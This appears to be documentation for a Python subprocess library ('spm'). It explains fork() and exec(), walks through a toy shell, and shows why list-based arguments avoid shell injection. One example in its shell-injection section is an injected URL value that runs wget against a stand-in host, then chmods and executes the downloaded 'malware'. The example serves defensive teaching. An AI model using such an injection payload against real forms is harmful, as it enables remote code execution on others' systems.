Why is spm secure?

There are two ways to execute subprocesses in python:

  • The first way is by passing a string to a shell. (Popen('string', shell=True))
  • The second one is buy passing a list of arguments to exec(). (Popen([arguments]))

How are subprocesses executed

Subprocesses are executed with two system calls: fork() and exec().

  • fork() create a copy of the current subprocess as a child process
  • exec() replaces the current process by another program

Here’s how fork works:

# This is going to print "Hello" twice
import os
os.fork()  # Create two processes running the
print "Hello"

The previous script will print “Hello” twice. You might be wondering “What is the point?”

Well — for example — this allow you to run an action in the background (like in another thread, but without the Python GIL):

import os
import sys

def run_in_background(action):
    pid = os.fork()
    if pid > 0:  # Parent process
        return  # Return to code calling this funtion
    else:
        try:
            action()
        finally:
            # Kill the subprocess, You don't want it to return to the code
            # calling function, and execute actions twice
            sys.exit()

On the other hand, exec() allow you to execute a command:

import os

# exec() has 6 different functions which are all
# doing the same thing with a different interface.
# execv() is one of them.
os.execv('/usr/bin/ls', ['ls', '/tmp/'])
print "This will never be printed"

Running this python script in your shell, would do exactly the samething as running ls /tmp in your shell. (Assuming /usr/bin/ is in your PATH)

You can also notice that the code after execv() will never be executed. Because the whole process is getting replaced by /usr/bin/ls.

So you should know where, we’re going. Here’s how subprocesses are executed:

import os

# This code is actually a lot more complex, because it includes logic to
# handle input/output.
def execute_subprocess(arguments):
    if os.fork() != 0:  # Parent process
        return
    else:  # Child process
        program = arguments[0]
        os.execv(program, arguments)
        # No need to sys.exit() since exec() never returns

How does a shell work?

So that you can understand well how a shell works, we’ll just implement a very simple one.

A shell just parse each line, and fork() and exec() with the arguments given in the line. It looks up commands in the PATH environment variable.

For simplicity our shell won’t support any environment variable manipulation.

#!/usr/bin/env python3
# Copyright (C) 2015 Antoine Catton
# Licensed under WTFPL <http://www.wtfpl.net/>

import shlex
import os
import sys

NORMAL_PIDWAIT = 0  # Just hardcoded variable you can ignore that


def lookup(command):
    """
    Lookup a command in PATH. For example::

        >>> lookup('ls')
        '/usr/bin/ls'
        >>> lookup('usermod')
        '/usr/sbin/usermod'
        >>> lookup('foobar')
        Traceback (most recent call last):
          File "<stdin>", line 1, in <module>
        ValueError: Invalid command

    This function is incredibly dumb, and does not search for an executable
    file.
    """
    for path in os.environ.get('PATH', '').split(':'):
        fname = os.path.join(path, command)
        if os.path.exists(fname):
            return fname
    raise ValueError("Invalid command")


def run(line):
    """
    Run a shell line: run('ls /tmp') will execv('/usr/bin/ls', ['ls', '/tmp'])
    """
    arguments = shlex.split(line)
    path = lookup(arguments[0])  # Lookup the first arguments in PATH
    execute(path, arguments)


def execute(path, arguments):
    """
    Wrapper around execv():

    * fork()s before exec()ing (in order to run the command in a subprocess)
    * wait for the subprocess to finish before returning (blocks the parent
      process)

    This is **hyper** simplistic. This *does not* handle **many** edge cases.

    *DO NOT DO THIS*: subprocess.check_call() does it better, and handle edge
    cases.
    """
    pid = os.fork()
    if pid == 0:
        try:
            os.execv(path, arguments)
        finally:
            sys.exit(1)  # In case path is not executable
    else:
        try:
            # Wait for subprocess to finish
            os.waitpid(pid, NORMAL_PIDWAIT)
        except OSError:
            pass  # The subprocess was already finish
        return

if __name__ == '__main__':

    while True:
        line = input('$ ')

        if line.strip() == 'exit':  # Wants to exit the shell
            break

        run(line)

Shell injection

In order to do piping easily, most people use subprocess.Popen(shell=True).

Let’s take this example:

import subprocess

# Mypy hinting for documentation
def does_url_contain(url: str, word: str) -> bool:
    returncode = subprocess.call('curl "{}" | grep "{}"'.format(url, word), shell=True)
    return returncode == 0

Let’s imagine you have a web form, in which you ask users to enter this data:

+-------------------------------------------+
|    +--------------------------------------|
| <  |  http://www.example.com/form/       ||
|    +--------------------------------------|
+-------------------------------------------+
|                                           |
|            +----------------------+       |
|      Url:  |                      |       |
|            +----------------------+       |
|                                           |
|            +----------------------+       |
|      Word: |                      |       |
|            +----------------------+       |
|                                           |
+-------------------------------------------+

An attacker could enter, the url::

" || wget http://example.net/malware && chmod a+x malware && ./malware #

This would execute the command:

curl "" || wget http://example.net/malware && chmod a+x malware && ./malware # | grep

And would result in an attacker being able to execute a malware on your system.

In order to mitigate this kind of attack does_url_contain should have been implented this way:

import subprocess
import shlex

def does_url_contain(unsafe_url: str, unsafe_word: str) -> bool:
    url, word = shlex.quote(unsafe_url), shlex.quote(unsafe_word)
    returncode = subprocess.call('curl {} | grep {}'.format(url, word), shell=True)
    return returncode == 0

Why spm isn’t vulnerable to shell injection by default

In order to prevent shell injection, you have to sanitize every piece data passed to the shell. This requires discipline, and everybody knows that even with discipline, humans make errors.

On the other hand, spm.run() doesn’t allow for shell injection since it requires arguments to be passed as a list. (= directly to exec())

The only way to create shell injection would be to call spm this way (which defeats the purpose of spm):

import spm

def subcommand(argument): # XXX: This is wrong!!
    return spm.run('bash', '-c', 'subcommand {}'.format(argument))

# The right way should be:
import functools
subcommand = functools.partial(spm.run, 'subcommand')

spm is shellshock proof

Do you remember shellshock? Code using subprocess.Popen(shell=True) could have been vulnerable since under the hood, it is calling /bin/bash -c youstring.

spm code wouldn’t have been vulnerable. (Unless you would have called bash of course.)

You still need spm even though you don’t have any user data

You might be wondering “why would I need spm if I don’t have any user input”.

It is recommended to use spm, since it would escape spaces, and things like this.

Also it provides a more pythonic API.

Environment propagation opt-in

By default, spm doesn’t propagate the environment to the subprocess. The user has to opt-in.

This prevents information leakage. If the environment was propagated by default, spm run from a CGI script could leak information about the user IP, Cookies, ...

This also ensure more security. LD_PRELOAD could be passed down to the process and execute arbitrary code.

Of course, the environment can alway be propagated. Think twice before propagating the environment.